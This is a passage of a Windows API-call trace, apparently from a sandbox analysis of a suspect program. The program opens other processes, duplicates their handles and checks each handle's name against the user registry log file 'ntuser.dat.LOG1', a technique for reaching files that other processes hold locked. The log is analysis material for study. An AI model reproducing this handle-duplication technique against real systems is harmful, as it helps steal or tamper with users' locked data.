hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.355] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.356] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.357] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.357] CloseHandle (hObject=0x670) returned 1 [0152.357] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.357] CloseHandle (hObject=0x680) returned 1 [0152.357] CloseHandle (hObject=0x62c) returned 1 [0152.357] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0152.357] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.357] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.358] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.358] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.358] CloseHandle (hObject=0x670) returned 1 [0152.358] CloseHandle (hObject=0x680) returned 1 [0152.359] CloseHandle (hObject=0x62c) returned 1 [0152.359] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0152.359] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.359] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.359] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.360] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.360] CloseHandle (hObject=0x670) returned 1 [0152.360] CloseHandle (hObject=0x680) returned 1 [0152.360] CloseHandle (hObject=0x62c) returned 1 [0152.360] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0152.360] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.360] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.361] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.361] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.361] CloseHandle (hObject=0x670) returned 1 [0152.361] CloseHandle (hObject=0x680) returned 1 [0152.361] CloseHandle (hObject=0x62c) returned 1 [0152.361] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0152.361] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.361] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.362] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.363] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.363] CloseHandle (hObject=0x670) returned 1 [0152.363] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.363] CloseHandle (hObject=0x680) returned 1 [0152.363] CloseHandle (hObject=0x62c) returned 1 [0152.363] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0152.363] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.363] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.364] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.365] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.365] CloseHandle (hObject=0x670) returned 1 [0152.365] CloseHandle (hObject=0x680) returned 1 [0152.365] CloseHandle (hObject=0x62c) returned 1 [0152.365] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0152.365] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.366] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.368] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.368] CloseHandle (hObject=0x670) returned 1 [0152.368] CloseHandle (hObject=0x680) returned 1 [0152.368] CloseHandle (hObject=0x62c) returned 1 [0152.368] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.368] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.369] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.369] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.369] CloseHandle (hObject=0x670) returned 1 [0152.370] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.370] CloseHandle (hObject=0x680) returned 1 [0152.370] CloseHandle (hObject=0x62c) returned 1 [0152.370] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.370] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.370] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.371] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.371] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.371] CloseHandle (hObject=0x670) returned 1 [0152.371] CloseHandle (hObject=0x680) returned 1 [0152.371] CloseHandle (hObject=0x62c) returned 1 [0152.371] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.372] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.372] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.373] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.373] CloseHandle (hObject=0x670) returned 1 [0152.373] _wcsicmp (_Str1="\\RacMetaData.dat", _Str2="\\ntuser.dat.LOG1") returned 4 [0152.373] CloseHandle (hObject=0x680) returned 1 [0152.373] CloseHandle (hObject=0x62c) returned 1 [0152.373] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.373] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.374] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.374] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.374] CloseHandle (hObject=0x670) returned 1 [0152.374] _wcsicmp (_Str1="\\RacDatabase.sdf", _Str2="\\ntuser.dat.LOG1") returned 4 [0152.374] CloseHandle (hObject=0x680) returned 1 [0152.375] CloseHandle (hObject=0x62c) returned 1 [0152.375] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.375] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.375] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.375] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.376] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.376] CloseHandle (hObject=0x670) returned 1 [0152.376] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.376] CloseHandle (hObject=0x680) returned 1 [0152.376] CloseHandle (hObject=0x62c) returned 1 [0152.376] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.376] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.376] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.377] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.378] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.378] CloseHandle (hObject=0x670) returned 1 [0152.378] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0152.378] CloseHandle (hObject=0x680) returned 1 [0152.378] CloseHandle (hObject=0x62c) returned 1 [0152.378] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.378] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.378] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.379] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.380] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.380] CloseHandle (hObject=0x670) returned 1 [0152.380] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.380] CloseHandle (hObject=0x680) returned 1 [0152.380] CloseHandle (hObject=0x62c) returned 1 [0152.380] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.380] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.380] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.381] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.381] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.381] CloseHandle (hObject=0x670) returned 1 [0152.382] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.382] CloseHandle (hObject=0x680) returned 1 [0152.382] CloseHandle (hObject=0x62c) returned 1 [0152.382] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.382] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.382] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.382] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.383] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.383] CloseHandle (hObject=0x670) returned 1 [0152.383] _wcsicmp (_Str1="\\WinSATAPI.dll.mui", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.383] CloseHandle (hObject=0x680) returned 1 [0152.383] CloseHandle (hObject=0x62c) returned 1 [0152.383] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.383] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.383] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.384] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.386] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.386] CloseHandle (hObject=0x670) returned 1 [0152.386] _wcsicmp (_Str1="\\RacWmiDatabase.sdf", _Str2="\\ntuser.dat.LOG1") returned 4 [0152.386] CloseHandle (hObject=0x680) returned 1 [0152.386] CloseHandle (hObject=0x62c) returned 1 [0152.386] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.386] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x34c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.386] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.387] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.391] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.392] CloseHandle (hObject=0x670) returned 1 [0152.392] _wcsicmp (_Str1="\\sqlB846.tmp", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.392] CloseHandle (hObject=0x680) returned 1 [0152.392] CloseHandle (hObject=0x62c) returned 1 [0152.392] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0152.392] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.392] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.392] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.393] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.393] CloseHandle (hObject=0x670) returned 1 [0152.393] _wcsicmp (_Str1="\\sqlB857.tmp", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.393] CloseHandle (hObject=0x680) returned 1 [0152.393] CloseHandle (hObject=0x62c) returned 1 [0152.393] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0152.393] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.394] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.395] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.395] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.396] CloseHandle (hObject=0x670) returned 1 [0152.396] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.396] CloseHandle (hObject=0x680) returned 1 [0152.396] CloseHandle (hObject=0x62c) returned 1 [0152.396] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0152.396] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.397] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.397] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.397] CloseHandle (hObject=0x670) returned 1 [0152.397] CloseHandle (hObject=0x680) returned 1 [0152.397] CloseHandle (hObject=0x62c) returned 1 [0152.397] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0152.397] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.397] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.398] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.399] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.399] CloseHandle (hObject=0x670) returned 1 [0152.399] _wcsicmp (_Str1="\\EQUATION", _Str2="\\ntuser.dat.LOG1") returned -9 [0152.399] CloseHandle (hObject=0x680) returned 1 [0152.399] CloseHandle (hObject=0x62c) returned 1 [0152.399] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0152.399] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xfc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.399] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.400] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.400] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.401] CloseHandle (hObject=0x670) returned 1 [0152.401] _wcsicmp (_Str1="\\Fonts", _Str2="\\ntuser.dat.LOG1") returned -8 [0152.401] CloseHandle (hObject=0x680) returned 1 [0152.401] CloseHandle (hObject=0x62c) returned 1 [0152.401] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0152.401] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.401] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.401] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.402] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.402] CloseHandle (hObject=0x670) returned 1 [0152.402] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.402] CloseHandle (hObject=0x680) returned 1 [0152.402] CloseHandle (hObject=0x62c) returned 1 [0152.402] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0152.402] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.402] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.403] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.404] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.404] CloseHandle (hObject=0x670) returned 1 [0152.404] CloseHandle (hObject=0x680) returned 1 [0152.404] CloseHandle (hObject=0x62c) returned 1 [0152.404] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0152.404] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x148, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.404] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.404] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.405] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.405] CloseHandle (hObject=0x670) returned 1 [0152.405] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.405] CloseHandle (hObject=0x680) returned 1 [0152.405] CloseHandle (hObject=0x62c) returned 1 [0152.405] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0152.405] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.405] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.406] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.407] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.407] CloseHandle (hObject=0x670) returned 1 [0152.407] CloseHandle (hObject=0x680) returned 1 [0152.407] CloseHandle (hObject=0x62c) returned 1 [0152.407] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0152.407] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.407] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.408] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.408] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.408] CloseHandle (hObject=0x670) returned 1 [0152.408] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.408] CloseHandle 